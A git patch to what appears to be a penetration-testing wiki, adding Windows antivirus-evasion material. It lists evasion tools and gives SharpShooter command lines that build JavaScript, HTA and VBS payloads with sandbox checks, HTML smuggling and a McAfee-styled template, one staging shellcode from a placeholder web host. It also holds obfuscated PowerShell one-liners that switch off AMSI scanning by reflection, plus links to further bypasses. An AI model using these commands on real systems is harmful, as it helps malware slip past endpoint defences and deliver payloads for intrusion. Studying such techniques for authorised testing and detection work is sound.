From b4cf1b25d8855429a848d792162b9eed0261f232 Mon Sep 17 00:00:00 2001 From: CPol Date: Tue, 10 Nov 2020 09:43:37 +0000 Subject: [PATCH] GitBook: [master] 2 pages modified --- windows/av-bypass.md | 27 +++++++++++++++++++ .../basic-powershell-for-pentesters/README.md | 14 +++++++++- 2 files changed, 40 insertions(+), 1 deletion(-) diff --git a/windows/av-bypass.md b/windows/av-bypass.md index 38dc0147..8beaa773 100644 --- a/windows/av-bypass.md +++ b/windows/av-bypass.md @@ -204,6 +204,33 @@ https://github.com/l0ss/Grouper2 {% embed url="http://niiconsulting.com/checkmate/2018/06/bypassing-detection-for-a-reverse-meterpreter-shell/" %} +## Other tools + +```bash +# Veil Framework: +https://github.com/Veil-Framework/Veil + +# Shellter +https://www.shellterproject.com/download/ + +# Sharpshooter +# https://github.com/mdsecactivebreach/SharpShooter +# Javascript Payload Stageless: +SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3 + +# Stageless HTA Payload: +SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee + +# Staged VBS: +SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4 + +# Donut: +https://github.com/TheWover/donut + +# Vulcan +https://github.com/praetorian-code/vulcan +``` + ## More {% embed url="https://github.com/EgeBalci/sgn" %} diff --git a/windows/basic-powershell-for-pentesters/README.md b/windows/basic-powershell-for-pentesters/README.md index 38b11285..f87972fc 100644 --- a/windows/basic-powershell-for-pentesters/README.md +++ b/windows/basic-powershell-for-pentesters/README.md @@ -329,7 +329,7 @@ Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse ## AMSI bypass -```text +```bash (old) [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true) @@ -338,5 +338,17 @@ $a = 'System.Management.Automation.A';$b = 'ms';$u = 'Utils' $assembly = [Ref].Assembly.GetType(('{0}{1}i{2}' -f $a,$b,$u)) $field = $assembly.GetField(('a{0}iInitFailed' -f $b),'NonPublic,Static') $field.SetValue($null,$true) + + +# Testing for Amsi Bypass: +https://github.com/rasta-mouse/AmsiScanBufferBypass + +# Amsi-Bypass-Powershell +https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell + +https://blog.f-secure.com/hunting-for-amsi-bypasses/ +https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ +https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans +https://slaeryan.github.io/posts/falcon-zero-alpha.html ```